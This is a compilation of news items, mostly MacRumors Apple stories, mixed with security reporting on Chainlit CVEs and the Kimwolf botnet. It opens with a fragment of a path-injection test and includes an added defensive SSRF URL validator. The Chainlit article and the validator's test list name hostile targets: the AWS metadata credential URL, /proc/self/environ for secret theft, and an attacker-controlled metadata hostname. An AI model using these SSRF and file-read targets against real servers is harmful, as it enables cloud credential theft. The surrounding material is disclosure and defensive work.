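                safe_repo_path(candidate, [root])
                results[name] = False
            except PermissionError:
                results[name] = True
        return results
    finally:
        shutil.rmtree(base)
```

The revision values still reach git before the '--', so keep them to a strict grammar (or verify each with git rev-parse --verify before use) rather than relying on the leading-dash check alone; the dash check is what closes the flag injection, the '--' is what keeps user paths from ever being read as options.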
Apple's App Store, iTunes Store, and Apple TV service are experiencing an outage at the current time, according to Apple's System Status page.


Apple says that some users may be experiencing issues with the ‌App Store‌ and iTunes Store. Apple also says some users may be seeing intermittent issues with ‌Apple TV‌. The ‌Apple TV‌ Channels feature is down too, and users may be unable to access some services or make purchases.

The services have been having issues since 6:48 p.m. Eastern Time. We'll update this article when the outage resolves.
This article, "App Store and Apple TV Experiencing Outage" first appeared on MacRumors.com

A judge in Paris today decided not to suspend Apple's App Tracking Transparency privacy feature in France, according to the French newspaper La Tribune.


In a statement shared with the publication, Apple said it welcomed the court's decision and will continue to support strong privacy protections for users.

Last year, Apple was fined €150 million by France's competition regulator, after it determined that the company's decision to implement App Tracking Transparency was an abuse of market dominance. Specifically, the regulator said the feature unfairly disadvantaged both third-party app developers and advertisers.

Since the release of iOS 14.5 in April 2021, Apple has required apps to ask for permission before tracking a user's activity across other apps and websites for personalized advertising. If a user selects the "Ask App Not to Track" option, the app is unable to access the device's advertising identifier. The feature enhances user privacy, but some advertisers have complained that it has significantly impacted revenue.

Last year, Apple warned that it may be forced to stop offering App Tracking Transparency in the EU due to regulatory pressures in countries such as France, Italy, Germany, and Poland, and from the overarching European Commission. But, it appears that the feature will live on in France for now following Apple's victory today.
Tag: App Tracking Transparency
This article, "Apple Can Still Offer a Key iPhone Privacy Feature in France, Says Judge" first appeared on MacRumors.com

Two vulnerabilities in popular AI development framework Chainlit could enable attackers to read arbitrary files and database content from servers. If left unpatched, the flaws could allow attackers to leak API keys and other secret tokens to facilitate lateral movement inside the organization’s infrastructure.
“These vulnerabilities can be triggered with no user interaction,” researchers from security firm Zafran said in a report on the Chainlit flaws. “Zafran confirmed the vulnerabilities in real-world, internet-facing applications operated by major enterprises.”
Chainlit is a Python-based package for building AI apps with chatbot interfaces. It handles authentication and offers integrations with various backend systems, databases, and cloud services. With over 5 million downloads in the past year from the Python Package Index (PyPI), Chainlit is often mentioned in tutorials for building user-facing interfaces for RAG systems and other LLM-powered apps.
The two vulnerabilities, tracked as CVE-2026-22218 and CVE-2026-22219, were fixed in version 2.9.4, released last month. The release notes at the time mentioned a “security vulnerability fix” but no other details until the advisory was released this week.
Arbitrary file reads through custom elements
The first vulnerability (CVE-2026-22218) is located in the framework’s Element class. In Chainlit, elements are pieces of content that can be attached to a message, for example images, PDF files, videos, audio files, and dataframes, among others.
The framework’s Element class also supports a custom type for rendering JSX (JavaScript XML) files inside a message. JSX extends JavaScript’s syntax with HTML-like markup and is commonly used by libraries such as React.
The Zafran researchers discovered that this custom element gives attackers control over all its properties, because it does not validate the fields. For example, if attackers send a custom element with the path property set to any file on the server, the file will be returned to the user session.
Because of this, the flaw allows attackers to read arbitrary files from the server, many of which can contain sensitive information. For example, /proc/self/environ exposes the process’s environment variables, which can contain API keys, credentials, internal file paths, database paths, tokens for AWS and other cloud services, and even CHAINLIT_AUTH_SECRET, the secret used to sign authentication tokens when authentication is enabled.
On top of that, if LangChain is used as the orchestration layer behind Chainlit and caching is enabled, user prompts sent to the LLM and the corresponding responses are saved to a file called .chainlit/.langchain.db. This file stores prompts across users and tenants, so attackers could exfiltrate it periodically to obtain sensitive information. Zafran’s proof-of-concept exploit involved leaking this file.
Server-side request forgery
The second vulnerability (CVE-2026-22219) uses the same custom element as an attack vector but exploits it in a different way, through the url property. By setting this field, attackers can force the server to request the specified URL, fetch its contents and save them in the database.
Chainlit uses PostgreSQL by default but can also use SQLAlchemy with different backends such as SQLite, or cloud storage providers such as AWS S3 or Azure Blobs. By exploiting this vulnerability, attackers can trigger a server-side request forgery (SSRF) to obtain credentials.
“If Chainlit is deployed on an AWS EC2 instance with IMDSv1 enabled, the SSRF vulnerability can be used to access http://169.254.169.254/latest/meta-data/iam/security-credentials/ and retrieve role endpoints, allowing lateral movement within the cloud account,” the researchers said.
By combining these two flaws, attackers can extract a lot of information and credentials but also the database itself or source code files from the application that might contain custom code.
“Once cloud credentials or IAM tokens are obtained from the server, the attacker is no longer limited to the application,” the researchers wrote in their report. “They gain access to the cloud environment behind it. Storage buckets, secrets managers, LLM, internal data, and other cloud resources may become accessible to an attacker.”
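A validator for an attacker-controllable fetch URL of the kind described above, added here as an example; it is not Chainlit's code or Zafran's proof of concept. It allows only http and https, resolves the hostname before the request so a name that points at the metadata service is refused just like the literal 169.254.169.254 from the report, and rejects every destination that is not globally routable (loopback, RFC 1918, link-local, CGNAT, IPv4-mapped IPv6). The policy, the optional host allowlist, and the fake DNS table used by demo() are assumptions for illustration.

```python
"""Validate an attacker-controllable fetch URL before the server requests it.

Added example, not Chainlit's code. The policy and the fake DNS table used by
demo() are constructed for illustration.
"""
import ipaddress
import socket
from urllib.parse import urlsplit


def resolve_host(host):
    """Every address the host resolves to; a literal IP resolves to itself."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_forbidden_ip(text):
    """True for anything not globally routable: loopback, RFC 1918, link-local
    (169.254.169.254), CGNAT 100.64/10, multicast, reserved. IPv4-mapped IPv6
    (::ffff:169.254.169.254) is unwrapped first so it cannot slip past."""
    ip = ipaddress.ip_address(text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not ip.is_global


def validate_fetch_url(url, resolver=resolve_host, allowed_hosts=None):
    """Return (host, sorted addresses) for a URL the server may fetch, or raise
    ValueError. Resolution happens here, so DNS pointing at an internal or
    metadata address is rejected like the literal address would be."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise ValueError("URL has no host")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    if allowed_hosts is not None and host not in allowed_hosts:
        raise ValueError(f"host not in allowlist: {host}")
    try:
        addresses = resolver(host)
    except OSError as exc:  # socket.gaierror is an OSError
        raise ValueError(f"cannot resolve {host}: {exc}") from exc
    if not addresses:
        raise ValueError(f"no addresses for {host}")
    for addr in addresses:
        if is_forbidden_ip(addr):
            raise ValueError(f"{host} resolves to non-public address {addr}")
    return host, sorted(addresses)


def is_safe_fetch_url(url, **kwargs):
    """Boolean wrapper around validate_fetch_url for policy checks."""
    try:
        validate_fetch_url(url, **kwargs)
        return True
    except ValueError:
        return False


FAKE_DNS = {  # constructed table standing in for DNS; real code uses resolve_host
    "api.example.com": {"93.184.216.34"},
    "169.254.169.254": {"169.254.169.254"},
    "::ffff:169.254.169.254": {"::ffff:169.254.169.254"},
    "intranet.corp": {"10.20.30.40"},
    "metadata.attacker.test": {"169.254.169.254"},
}


def fake_resolver(host):
    """Resolver used by demo(); unknown names fail like a real lookup would."""
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise socket.gaierror(f"unknown host {host}")


def demo():
    """Run the check over constructed URLs with the fake resolver."""
    urls = [
        "https://api.example.com/v1/data",
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://[::ffff:169.254.169.254]/latest/meta-data/",
        "http://intranet.corp/admin",
        "http://metadata.attacker.test/latest/meta-data/",
        "file:///proc/self/environ",
    ]
    return {u: is_safe_fetch_url(u, resolver=fake_resolver) for u in urls}
```

Two caveats a practitioner should carry into the fetch itself: the name can be re-resolved to a different address between this check and the connection (DNS rebinding), so connect to the address that was validated or re-check at connect time; and every redirect hop is a new destination that needs the same validation, so either disable redirects or validate each Location before following it.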
The Zafran report contains signatures for the Snort network intrusion detection system and for the Cloudflare web application firewall, which can be used to block attack attempts until applications are updated to a patched Chainlit version.
Apple Fitness+ is now available in Japan, according to Japanese site Mac Otakara. Apple users who open the Fitness app on the iPhone will see the Apple Fitness+ tab available starting today.


Apple is providing users with a 1-month free trial, and after that, the service is priced at 980 yen per month or 7,800 yen per year. Japanese users do not have access to an Apple One plan that includes Apple Fitness+, as Apple does not provide a Premier plan in the country.

Apple said back in December that Apple Fitness+ would expand to Japan in early 2026. The service also recently became available in 28 new markets, including Hong Kong, India, the Netherlands, Singapore, and Taiwan.

Fitness+ workouts and meditations are digitally dubbed with a generated voice in Japanese, with more dubbed episodes added on a weekly basis. Apple also provides workouts in English or with Spanish and German dubbing. Digital dubbing requires iOS 26.1, iPadOS 26.1, and tvOS 26.1.

With the addition of Japan, users in 49 countries and regions around the world are able to access the Apple Fitness+ service. There are 12 different workout types available, such as strength, yoga, HIIT, pilates, dance, cycling, kickboxing, and meditation.

Workouts can be done using the ‌iPhone‌, iPad, and Apple TV. When Fitness+ is used with an Apple Watch or AirPods Pro 3, personalized metrics like heart rate, calories burned, and activity progress are displayed on the ‌iPhone‌, ‌iPad‌, or ‌Apple TV‌ screen.
Tag: Apple Fitness Plus
This article, "Apple Fitness+ Expands to Japan" first appeared on MacRumors.com

We're likely just weeks away from Apple's next iPhone launch, with the company set to introduce the ‌iPhone‌ 17e. The ‌iPhone‌ 17e is a follow-up to the iPhone 16e that came out in February 2025, and rumors suggest that it could have some welcome improvements.


Design

The ‌iPhone‌ 17e is supposedly going to look a lot like the ‌iPhone 16e‌, featuring the same 6.1-inch display size, single-lens rear camera, and black and white color options.

While the display isn't changing much, the device could have a Dynamic Island instead of a notch, which would be a marked visual difference.

Display

The ‌iPhone‌ 17e is expected to feature the same display panel as the ‌iPhone 16e‌, which means it will be limited to a 60Hz refresh rate. Apple brought 120Hz ProMotion refresh rates to the standard iPhone 17 in 2025, but the same technology is not expected for the more affordable ‌iPhone‌ 17e.

120Hz refresh rates provide video improvements and smoother scrolling when viewing webpages.

The ‌iPhone 16e‌ does not have always-on display technology, and that's not likely to change with the ‌iPhone‌ 17e. To support always-on, the ‌iPhone‌ 17e would need an OLED display with 1-nit minimum brightness, which is limited to Apple's more expensive iPhones. HDR and brightness are also lacking compared to Apple's flagship lineup.

Though the display isn't changing, there have been rumors suggesting Apple could shrink the bezel size somewhat, allowing for more visible display area.

Dynamic Island

The ‌iPhone 16e‌ continues to feature the notch that Apple has eliminated in its newer flagship iPhones, but the ‌iPhone‌ 17e might do away with it. Rumors suggest that the ‌iPhone‌ 17e will have a ‌Dynamic Island‌ instead of a notch, giving it a more modern look.


The ‌Dynamic Island‌ is a pill-shaped cutout on the ‌iPhone‌'s display that houses the TrueDepth camera system and the front-facing camera. It takes up less display area than the notch, and it is better integrated into the ‌iPhone‌.

Apple uses software to change the size and shape of the ‌Dynamic Island‌ to accommodate alerts, notifications, and Live Activities. The ‌Dynamic Island‌ can show everything from Apple Maps turn-by-turn directions to active timers, incoming phone calls, and Face ID activations. It also displays privacy indicators for the microphone or camera, alerts when accessories connect, and indicators for the flashlight, screen recording, incoming AirDrop files, and more.

The ‌Dynamic Island‌ is much more interactive and useful than the notch, because there is an option to tap into the ‌Dynamic Island‌ to access different app features.

One rumor suggests the ‌iPhone‌ 17e will continue to use a notch, so the ‌Dynamic Island‌ upgrade isn't a guarantee.

A19 Chip

The ‌iPhone‌ 17e is expected to use Apple's A19 chip, which was first introduced in the ‌iPhone 17‌. The A19 chip is built using Apple's upgraded N3P 3-nanometer process, offering a 5 to 10 percent performance improvement over the A18 chip.

Apple could be planning to use a downclocked version of the A19 chip in the ‌iPhone‌ 17e, and if that's the case, its performance won't quite match the ‌iPhone 17‌'s performance.

The A18 chip that Apple used in the ‌iPhone 16e‌ had a 4-core GPU instead of a 5-core GPU like the version from the iPhone 16, so the ‌iPhone‌ 17e could get a similar GPU downgrade.

Aside from the improved CPU and GPU, the A19 has an updated display engine, image signal processor, and Neural Engine for improved AI performance. Every GPU core features a Neural Accelerator to boost the performance of local AI models.

We are expecting the ‌iPhone‌ 17e to continue to include 8GB RAM like the ‌iPhone 16e‌. Apple's other models have 12GB.

MagSafe Compatibility

The ‌iPhone 16e‌ does not have a magnetic ring for MagSafe charging, but the ‌iPhone‌ 17e could feature ‌MagSafe‌ compatibility. Rumors suggest the ‌iPhone‌ 17e will support magnetic wireless charging, which would be a major upgrade over the ‌iPhone 16e‌.

Apple's iPhones have used ‌MagSafe‌ since the ‌iPhone‌ 12, so there are a wide array of ‌MagSafe‌ cases and accessories. The ‌iPhone 16e‌ is not compatible with these accessories, which is a major limitation.

Since it doesn't have ‌MagSafe‌, the ‌iPhone 16e‌ is limited to 7.5W wireless charging speeds. ‌MagSafe‌ would upgrade that to at least 15W. The current ‌iPhone 17‌ models can charge at 25W over ‌MagSafe‌, though the iPhone Air is limited to 20W.

Camera

The ‌iPhone‌ 17e is expected to have a single 48-megapixel Wide Angle camera at the back, with no upgrade rumored. The ‌iPhone 16e‌ doesn't have a Camera Control button, and there's no word on whether Apple will bring it to the ‌iPhone‌ 17e.

The ‌iPhone 17‌ models got an upgraded 18-megapixel Center Stage front-facing camera, but rumors suggest the ‌iPhone‌ 17e will continue to use the same 12-megapixel front-facing camera as the ‌iPhone 16e‌.

Modem

The ‌iPhone‌ 17e will adopt Apple's C1X modem, the modem chip that Apple first debuted in the ‌iPhone Air‌. The C1X modem is faster and more efficient than the C1 modem that Apple used in the ‌iPhone 16e‌.

Apple says the C1X modem is up to 2x faster than the C1, and it is far more energy efficient than Qualcomm modems.

No N1 Chip

While the ‌iPhone 17‌ models received Apple's new Wi-Fi and Bluetooth "N1" networking chip, leaked Apple code suggests the chip will not be included in the ‌iPhone‌ 17e in order to keep costs down.

Pricing

The ‌iPhone 16e‌ is priced starting at $599, and no price changes are expected for the ‌iPhone‌ 17e.

Launch Date

Rumors suggest that the ‌iPhone‌ 17e is going to come in the first half of 2026, and Apple could stick to the February release timing. The ‌iPhone 16e‌ was introduced via press release on February 19, 2025, so we're probably not waiting on an event for the 17e.

For that reason, it could come anytime in February, though there's also a possibility that Apple will hold it until the March or April timeframe. In late March or early April, Apple plans to release iOS 26.4 with a new version of Siri, along with several updated home products.
This article, "Apple's Next iPhone: What to Expect From the 2026 iPhone 17e" first appeared on MacRumors.com

Airlock Digital, a leader in proactive application control and endpoint security, announced the release of The Total Economic Impact (TEI) of Airlock Digital, an independent study commissioned by Airlock Digital and conducted by Forrester Consulting. The study demonstrates a significant 224% return on investment (ROI) and a $3.8 million net present value (NPV) over three years for organizations adopting Airlock Digital’s allowlisting approach. These findings underline both the financial and security value of Airlock Digital’s solution.
Cyber NewsWire
Forrester’s TEI methodology evaluates the potential financial impact of technology investments by aggregating insights from customer interviews and modeling a composite organization representative of global organizations. According to the study, Airlock Digital enabled:
224% ROI over three years
$3.8M net present value based on quantified benefits versus costs
>25% reduction in overall risk of security breaches
Zero breaches reported by interviewed organizations after deploying Airlock Digital
Significant operational efficiencies with reduced administrative overhead
David Cottingham, Co-founder and CEO at Airlock Digital, said: “For modern enterprises, trust cannot be assumed… it must be enforced. Allowlisting and application control give organizations the power to run only what they trust, blocking all malware and ransomware before they can execute. For us, the Forrester Consulting TEI study reinforces the importance of our mission at Airlock Digital, which is to deliver proactive endpoint security that makes application control not just possible, but effortless. It’s why we have become synonymous with this critical layer of cyber defense—and why every organization needs it at the core of their security strategy.”
As cyberattacks continue to grow in scale and sophistication, more organizations are turning to application control and allowlisting as foundational components of a proactive security strategy. Traditional reactive security tools attempt to detect and block threats after execution attempts are made—often too late to prevent compromise. Allowlisting reverses this paradigm, enforcing a Deny by Default posture that ensures only trusted and approved software is permitted to run. This approach dramatically reduces the attack surface, curbs the spread of malware and ransomware, and helps organizations meet increasingly stringent regulatory and compliance requirements. Airlock Digital’s modern, operationally friendly implementation of allowlisting enables security teams to adopt this strategy without the administrative complexity historically associated with legacy tools.
The study highlights that Airlock Digital helps organizations strengthen their security posture, lower ongoing maintenance costs, and improve software inventory management while keeping operational and administrative burden low. The study noted that a single security analyst can effectively manage Airlock Digital policies in much less time than traditional solutions require, contributing to cost savings and improved productivity.
Patrick Dillon, CRO at Airlock Digital said: “The Forrester Consulting TEI study gives security leaders, in our opinion, clear, independent validation of the impact delivered by Airlock Digital. Forrester Consulting calculated the benefits to include a 224% ROI and fast payback — and most importantly — participating organizations reported zero breaches after implementation. Airlock Digital combines simplicity with enterprise-grade scale, enforcing a Deny by Default posture that blocks untrusted code, including malware and ransomware. For organizations ready to move from reactive defenses to proactive prevention, Airlock Digital provides a quantified and operationally efficient path forward — requiring, according to the Forrester Consulting study, only 2.5 hours per week to manage. We’d be glad to walk you through the findings.”
About Airlock Digital
Airlock Digital delivers market-leading allowlisting and application control solutions that empower enterprises to enforce a Deny by Default security posture. Trusted globally across industries, Airlock Digital enables organizations to prevent unauthorized code execution, simplify compliance, and strengthen cyber-resilience without sacrificing performance or user productivity. This approach minimizes attack surfaces and helps organizations align their cybersecurity strategies with government frameworks and standards.
Users can download the full Forrester TEI study: https://www.airlockdigital.com/forrester-tei-report

Contact
VP of Marketing
Erin Welke
Airlock Digital
[email protected]
Apple today released new firmware for the Magic Keyboards designed for the iPad Pro and iPad Air. The firmware for the M4/M5 ‌iPad Pro‌ model has a version number of 1872.544.772, up from the prior 0680.0220.0301 firmware, while the firmware for the M3 ‌iPad Air‌ model has a version number of 1024.320.771, up from 0350.0135.0303.


The new firmware is available for both the 11-inch and 13-inch ‌iPad Pro‌ Magic Keyboard options that Apple sells for the M4 and M5 ‌iPad Pro‌ models, as well as the version that Apple sells for the M3 ‌iPad Air‌.

Apple overhauled the Magic Keyboard in May 2024 alongside the launch of the M4 ‌iPad Pro‌. The updated keyboard has the same floating cantilevered design as the prior version, but it includes a dedicated row of function keys, along with a larger glass trackpad.

Magic Keyboard firmware updates are infrequent, and there is no method for manually refreshing the software. New firmware is installed automatically when the keyboard is attached to an ‌iPad Pro‌ that is connected to the internet.

You can check the firmware version of your Magic Keyboard by opening up the Settings app and going to General > About > Magic Keyboard.
Tag: Magic Keyboard
This article, "Apple Releases New Firmware for iPad Pro and iPad Air Magic Keyboards" first appeared on MacRumors.com

Nomad today introduced a new version of its popular titanium Stratos band that's designed for the Apple Watch. The new version features a limited edition icy blue glow colorway, providing a subtle glow-in-the-dark effect that can be seen between the titanium links of the band.


Available for $189, the Stratos Apple Watch band combines the look of titanium with the comfort of fluoroelastomer. The band features outer links made from metal injection molded Grade 4 titanium, paired with molded FKM material on the interior.


The fluoroelastomer connects each titanium link, offering flexibility and comfort that's unavailable with traditional metal bands, including Apple's own titanium band. The FKM material peeks through the rounded titanium links, adding visual interest and space for ventilation to bolster moisture evaporation and breathability.


Nomad makes the Stratos band in Silver and Black titanium, with black, ultra orange, volt, and icy blue glow FKM color options. The latter is the new color, and we were able to try out the band before it launched. Nomad's imagery largely depicts the band in the dark with a rich, blue glow coming from the fluoroelastomer underlayer, but the actual blue shade in the light is much subtler. The color is a soft, muted blue that's close to white from a distance.

Exposing the band to sunlight or bright light produces a glow effect, but it's faint. The FKM material of the Stratos band is beneath the titanium and against the wrist, so it sees little light exposure. Light is needed for the glow to work, which means the overall result is subdued. For the most part, expect the band to look more white than blue between the links, but you will see thin lines of the blue color peeking through the links in the dark.


The band is comfortable on the wrist, and it's simple to remove links with the included tool to get a custom fit. The magnetic clasp is easy to close, and it only opens when squeezing the sides of the buckle, so it should remain secure. The clasp can pinch the skin when it's being closed, so be wary of that when putting the band on.


Having the fluoroelastomer underneath the titanium makes for a softer feel on the wrist than just titanium alone, and Nomad's band options are far cheaper than Apple's similar bands.

You can order the Icy Blue Glow Stratos Band from the Nomad website for $189.
Tag: Nomad
This article, "Nomad Launches Hybrid Titanium Apple Watch Band in New 'Icy Blue Glow' Color" first appeared on MacRumors.com

The North Korean threat actors associated with the long-running Contagious Interview campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints. The latest finding demonstrates continued evolution of the new tactic that was first discovered in December 2025, Jamf Threat Labs said. "This activity involved
A new Internet-of-Things (IoT) botnet called Kimwolf has spread to more than 2 million devices, forcing infected systems to participate in massive distributed denial-of-service (DDoS) attacks and to relay other malicious and abusive Internet traffic. Kimwolf’s ability to scan the local networks of compromised systems for other IoT devices to infect makes it a sobering threat to organizations, and new research reveals Kimwolf is surprisingly prevalent in government and corporate networks.
Image: Shutterstock, @Elzicon.
Kimwolf grew rapidly in the waning months of 2025 by tricking various “residential proxy” services into relaying malicious commands to devices on the local networks of those proxy endpoints. Residential proxies are sold as a way to anonymize and localize one’s Web traffic to a specific region, and the biggest of these services allow customers to route their Internet activity through devices in virtually any country or city around the globe.
The malware that turns one’s Internet connection into a proxy node is often quietly bundled with various mobile apps and games, and it typically forces the infected device to relay malicious and abusive traffic — including ad fraud, account takeover attempts, and mass content-scraping.
Kimwolf mainly targeted proxies from IPIDEA, a Chinese service that has millions of proxy endpoints for rent on any given week. The Kimwolf operators discovered they could forward malicious commands to the internal networks of IPIDEA proxy endpoints, and then programmatically scan for and infect other vulnerable devices on each endpoint’s local network.
Most of the systems compromised through Kimwolf's local network scanning have been unofficial Android TV streaming boxes. These are typically Android Open Source Project devices — not Android TV OS devices or Play Protect certified Android devices — and they are generally marketed as a way to watch unlimited (read: pirated) video content from popular subscription streaming services for a one-time fee.
However, a great many of these TV boxes ship to consumers with residential proxy software pre-installed. What’s more, they have no real security or authentication built-in: If you can communicate directly with the TV box, you can also easily compromise it with malware.
While IPIDEA and other affected proxy providers recently have taken steps to block threats like Kimwolf from going upstream into their endpoints (reportedly with varying degrees of success), the Kimwolf malware remains on millions of infected devices.
A screenshot of IPIDEA’s proxy service.
Kimwolf’s close association with residential proxy networks and compromised Android TV boxes might suggest we’d find relatively few infections on corporate networks. However, the security firm Infoblox said a recent review of its customer traffic found nearly 25 percent of them made a query to a Kimwolf-related domain name since October 1, 2025, when the botnet first showed signs of life.
Infoblox found the affected customers are based all over the world and in a wide range of industry verticals, from education and healthcare to government and finance.
“To be clear, this suggests that nearly 25% of customers had at least one device that was an endpoint in a residential proxy service targeted by Kimwolf operators,” Infoblox explained. “Such a device, maybe a phone or a laptop, was essentially co-opted by the threat actor to probe the local network for vulnerable devices. A query means a scan was made, not that new devices were compromised. Lateral movement would fail if there were no vulnerable devices to be found or if the DNS resolution was blocked.”
Synthient, a startup that tracks proxy services and was the first to disclose on January 2 the unique methods Kimwolf uses to spread, found proxy endpoints from IPIDEA were present in alarming numbers at government and academic institutions worldwide. Synthient said it spied at least 33,000 affected Internet addresses at universities and colleges, and nearly 8,000 IPIDEA proxies within various U.S. and foreign government networks.
The top 50 domain names sought out by users of IPIDEA’s residential proxy service, according to Synthient.
In a webinar on January 16, experts at the proxy tracking service Spur profiled Internet addresses associated with IPIDEA and 10 other proxy services that were thought to be vulnerable to Kimwolf’s tricks. Spur found residential proxies in nearly 300 government owned and operated networks, 318 utility companies, 166 healthcare companies or hospitals, and 141 companies in banking and finance.
“I looked at the 298 [government] owned and operated [networks], and so many of them were DoD [U.S. Department of Defense], which is kind of terrifying that DoD has IPIDEA and these other proxy services located inside of it,” Spur Co-Founder Riley Kilmer said. “I don’t know how these enterprises have these networks set up. It could be that [infected devices] are segregated on the network, that even if you had local access it doesn’t really mean much. However, it’s something to be aware of. If a device goes in, anything that device has access to the proxy would have access to.”
Kilmer said Kimwolf demonstrates how a single residential proxy infection can quickly lead to bigger problems for organizations that are harboring unsecured devices behind their firewalls, noting that proxy services present a potentially simple way for attackers to probe other devices on the local network of a targeted organization.
“If you know you have [proxy] infections that are located in a company, you can choose that [network] to come out of and then locally pivot,” Kilmer said. “If you have an idea of where to start or look, now you have a foothold in a company or an enterprise based on just that.”
This is the third story in our series on the Kimwolf botnet. Next week, we’ll shed light on the myriad China-based individuals and companies connected to the Badbox 2.0 botnet, the collective name given to a vast number of Android TV streaming box models that ship with no discernible security or authentication built-in, and with residential proxy malware pre-installed.
Further reading:
The Kimwolf Botnet is Stalking Your Local Network
Who Benefitted from the Aisuru and Kimwolf Botnets?
A Broken System Fueling Botnets (Synthient).
View the full article
Apple is planning to debut a high-end secondary version of AirPods Pro 3 this year, sitting in the lineup alongside the current model, reports suggest.


Back in September 2025, supply chain analyst Ming-Chi Kuo reported that Apple is planning to introduce a successor to the ‌AirPods Pro 3‌ in 2026. This would be somewhat unusual since Apple normally waits around three years to make major changes to the AirPods' hardware. AirPods Pro 2 debuted at the iPhone 14 event in September 2022, and they were updated with a USB-C charging case and a few other tweaks in September 2023. Otherwise, Apple has waited about three years to update all of its AirPods models.

Kuo said that the 2026 AirPods Pro will feature a "more significant" hardware upgrade in the form of at least one tiny infrared camera. He previously said AirPods with infrared cameras could recognize hand gestures and provide an enhanced spatial audio experience with Apple's Vision Pro headset.

The Chinese leaker known as "Instant Digital" subsequently corroborated the rumor with some additional details and clarifications. Rather than being a new generation, the 2026 AirPods Pro will apparently be a pricier, high-end variant of the ‌AirPods Pro 3‌ introduced in 2025, suggesting that both models will ultimately be on sale alongside each other. It is worth noting that Apple offers two versions of the AirPods 4 at $129 and $179 price points, so this is a highly plausible move.

The current AirPods lineup has offerings priced at $129, $179, $249, and $549. An additional product between the $249 ‌AirPods Pro 3‌ and $549 AirPods Max seems possible, especially given the rise of higher-end Bluetooth earbuds from the likes of Bang & Olufsen, Bowers & Wilkins, and Bose.

As Kuo first said, Instant Digital similarly believes that the key differentiator will be an infrared camera for gesture controls. In fact, Apple may remove the high-end model's pressure-sensors and go all-in on gesture controls.

The H3 chip is also a possibility. According to Bloomberg's Mark Gurman, the next-generation audio chip is in development. The ‌AirPods Pro 3‌ launched last year stuck with the same H2 chip from their predecessor released in 2022.

Launch timing is currently unclear, but Apple typically announces new AirPods in the second half of the year. The original AirPods, AirPods Pro 2 and their subsequent USB-C revision, ‌AirPods 4‌, and ‌AirPods Pro 3‌ were all announced at Apple's annual ‌iPhone‌ event in September.
This article, "New, Higher End AirPods Pro Coming This Year" first appeared on MacRumors.com


View the full article
Respected veteran display analyst Ross Young has added his support to a new leak today about the iPhone 18 Pro's front-panel design.


In a new post on X (Twitter), the now-retired Counterpoint Research VP said that Chinese leaker Instant Digital's latest explanation of how Apple will shrink the Dynamic Island is what he was alluding to in a report last year.

Back in June 2025, Young said that while some parts of Apple's Face ID system would move under the display on iPhone 18 Pro models, the devices would retain visible Face ID elements – meaning the Dynamic Island would persist, albeit in a smaller form than on the iPhone 14 Pro through iPhone 17 Pro.

That's effectively what Instant Digital claimed earlier today: the leaker explained that only the IR flood illuminator would move under the display to the top-left corner, while the dot projector, infrared camera, and selfie camera would remain housed in a reduced, centered Dynamic Island. Another Chinese leaker has since backed the claim, which also corresponds to reporting last year by Bloomberg's Mark Gurman.

Young's corroboration directly contradicts a recent report by The Information's Wayne Ma that said Apple would move the selfie camera to the top-left corner of the iPhone 18 Pro's display, resulting in a hole-punch cutout and the removal of the pill-shaped Dynamic Island.

It seems increasingly likely that details from Ma's sources were either lost in translation or misinterpreted, possibly due to partial knowledge of an under-display Face ID component.

Apple is expected to unveil the iPhone 18 Pro models in September.
Related Roundup: iPhone 18
Tag: Ross Young
Related Forum: iPhone
This article, "Latest iPhone 18 Pro Leak Corroborated by Respected Former Analyst" first appeared on MacRumors.com


View the full article
Amazon today has dropped the price of the new M5 MacBook Pro to $1,449.00, down from $1,599.00. This is the 10-Core model with 16GB RAM and 512GB SSD, and it's a solid second-best price on the M5 MacBook Pro.

Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Additionally, the 16GB RAM/1TB M5 MacBook Pro is available for $1,629.00 ($170 off) and the 24GB RAM/1TB M5 MacBook Pro has hit $1,825.00 on Amazon ($174 off). All three models have estimated delivery dates around January 25.

$150 OFF: 14-inch M5 MacBook Pro (16GB RAM/512GB) for $1,449.00
$170 OFF: 14-inch M5 MacBook Pro (16GB RAM/1TB) for $1,629.00
$174 OFF: 14-inch M5 MacBook Pro (24GB RAM/1TB) for $1,825.00


This version of the MacBook Pro launched in October and it comes with the newest M5 chip, which offers up to 15% faster CPU performance and up to 45% faster graphics when compared to the M4 chip. If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.







Related Roundup: Apple Deals
This article, "Amazon Takes Up to $174 Off Apple's M5 MacBook Pro" first appeared on MacRumors.com


View the full article
Apple reclaimed the leading position in China's smartphone market in the fourth quarter of 2025 as strong demand for the iPhone 17 lineup offset a contracting market and growing supply-chain pressure from memory chip shortages.


New data from Counterpoint Research shows that smartphone shipments in China declined 1.6% year over year in the fourth quarter of 2025 and fell 0.6% for the full year, reflecting weaker consumer demand driven primarily by rising prices linked to escalating memory costs. Within that environment, Apple's performance diverged sharply from the market as a whole. Counterpoint said Apple's shipments in China rose 28% year over year during the holiday quarter, allowing the company to rank first in the market with a 22% share in the fourth quarter.

The improvement marks a notable reversal from earlier in 2025, when Apple trailed domestic competitors in China. According to Counterpoint, the change was driven by strong demand for the ‌iPhone 17‌ lineup, which accounted for roughly 20% of Apple's shipments in China during the quarter. The firm noted demand was particularly concentrated among the Pro models. Counterpoint added that Apple benefited from an accelerated supply ramp up late in the year, enabling it to meet holiday demand more effectively than some rivals that were constrained by component availability.

The notable exception within Apple's lineup was the iPhone Air. Counterpoint said the model captured only a low single-digit share of Apple's China shipments following its debut. This is attributed to a slower start due to the device's later launch compared with other regions and to perceived trade-offs between its ultra-thin design and overall feature set.

For the full year, Apple did not lead the Chinese market, but it narrowed the gap with domestic competitors. Counterpoint said Huawei ranked first in China for 2025 with a 16.4% market share, followed closely by Apple and vivo at around 16% each. Xiaomi and Oppo trailed slightly behind at roughly 15% each.

